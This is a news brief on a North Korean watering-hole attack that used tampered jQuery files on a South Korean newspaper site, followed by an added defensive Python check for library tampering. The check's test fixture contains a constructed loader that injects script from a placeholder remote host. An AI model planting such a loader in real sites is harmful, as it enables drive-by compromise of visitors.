NK Hackers Deploy Browser Exploits on South Korean Sites to Spread Malware
2021-08-18 07:51

A North Korean threat actor has been discovered taking advantage of two exploits in Internet Explorer to infect victims with a custom implant as part of a strategic web compromise targeting a South Korean online newspaper.

The "clever disguise of exploit code amongst legitimate code" and the use of custom malware enable the attackers to avoid detection, Volexity researchers said.

The attacks involved tampering with the jQuery JavaScript libraries hosted on the website to serve additional obfuscated JavaScript code from a remote URL, using it to leverage exploits for two Internet Explorer flaws that were patched by Microsoft in August 2020 and March 2021.
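A defender-side check for the kind of library tampering described above, as an added example that is not from the original article or from Volexity: it compares a served library file against a known-good baseline by Subresource Integrity (SRI) hash and lists any URLs that appear only in the served copy. The library contents, domains and function names are constructed for illustration.

```python
import base64
import hashlib
import re

# Constructed stand-in for a pristine vendor library file (not real jQuery).
PRISTINE = (
    b'/*! examplelib v1.0 | https://lib.example/license */\n'
    b'(function(w){w.lib={v:"1.0"};})(window);\n'
)

# Constructed tampered copy: the same file with a loader appended that pulls
# additional script from a remote host (placeholder domain).
TAMPERED = PRISTINE + (
    b'(function(){var s=document.createElement("script");'
    b's.src="https://cdn.remote.example/x.js";'
    b'document.head.appendChild(s);})();\n'
)

# Absolute or protocol-relative URLs embedded in script text.
URL_RE = re.compile(rb'(?:https?:)?//[A-Za-z0-9.-]+\.[A-Za-z]{2,}[^\s"\'<>)]*')


def sri(data: bytes) -> str:
    """Return the sha384 Subresource Integrity value for a script body."""
    digest = hashlib.sha384(data).digest()
    return "sha384-" + base64.b64encode(digest).decode()


def check_library(served: bytes, baseline: bytes) -> dict:
    """Compare a served library file against its known-good baseline."""
    known = set(URL_RE.findall(baseline))
    found = set(URL_RE.findall(served))
    return {
        "modified": sri(served) != sri(baseline),
        "expected_sri": sri(baseline),
        # URLs present only in the served copy are the first thing to triage.
        "new_urls": sorted(u.decode() for u in found - known),
    }


if __name__ == "__main__":
    print(check_library(TAMPERED, PRISTINE))
```

The `expected_sri` value is what a page would pin in a `<script integrity="...">` attribute when the library is loaded from another origin; for self-hosted files, the same comparison can run as a scheduled integrity check on the web server.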

It's worth noting that both flaws have been actively exploited in the wild, with the latter put to use by North Korean hackers to compromise security researchers working on vulnerability research and development in a campaign that came to light earlier this January.

In a separate set of attacks disclosed last month, an unidentified threat actor was found exploiting the same flaw to deliver a fully-featured VBA-based remote access trojan on compromised Windows systems.

"The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience."


News URL

http://feedproxy.google.com/~r/TheHackersNews/~3/f3Q4pG8_fI8/nk-hackers-deploy-browser-exploit-on.html